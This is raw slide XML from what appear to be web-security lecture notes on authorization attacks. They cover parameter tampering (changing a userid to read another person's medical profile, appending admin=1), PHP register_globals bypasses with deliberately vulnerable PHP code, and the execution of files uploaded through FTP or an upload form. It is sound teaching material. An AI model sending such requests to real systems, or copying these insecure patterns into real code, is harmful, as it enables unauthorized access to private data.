      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65389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27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27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27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27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27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27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27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277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27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Authorization Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameter manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The resources accessible are determined by the parameters to a query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If client-side information is blindly accepted, one can simply modify the parameter of a legitimate request to access additional information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>cgi-bin/profile?userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=1229&amp;type=medical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>cgi-bin/profile?userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1230</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;type=medical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameter creation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If parameters from the URL are imported into the application, can be used to modify the behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>profile?userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=1229&amp;type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>medical&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136668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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>register_global</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1073155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>register_global</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directive makes request information, such as the GET/POST variables and cookie information, available as global variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variables can be provided so that particular, unexpected execution paths are followed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33599151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latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>register_globals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;head&gt; &lt;title&gt;Feedback Page&lt;/title&gt;&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;h1&gt;Feedback Page&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      if ($name &amp;&amp; $comment) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        $file = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user_feedback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>", "a");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($file, "$name:$comment\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($file);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        echo "Feedback submitted\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;form method=POST&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      &lt;input type="text" name="name"&gt;&lt;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&lt;input type="text" name="comment"&gt;&lt;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&lt;input type="submit" name="submit" value="Submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182430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pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  if ($_GET["password"] == "secretunguessable1u90jkfld") {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    $admin = true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  if ($admin) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>show_secret_admin_stuff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15074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285750" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.php?password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo&amp;admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  if ($_GET["password"] == "secretunguessable1u90jkfld") {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    $admin = true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  if ($admin) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>show_secret_admin_stuff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1850571" y="1968500"/>
            <a:ext cx="2939143" cy="196850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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Server (Mis)Configuration: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Unexpected Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FTP servers and web servers often run on the same host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If data can be uploaded using FTP and then requested using the web server it is possible to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute programs using CGI (upload to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-bin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute programs as web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a web site allows one to upload files (e.g., images) it might be possible to upload content that is then requested as a code component (e.g., a PHP file)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166053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Mixing Code and Data in Web Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Numerous areas where Code and Data are mixed in Web Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anywhere that strings are concatenated to produce output to another program/parser, possible problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
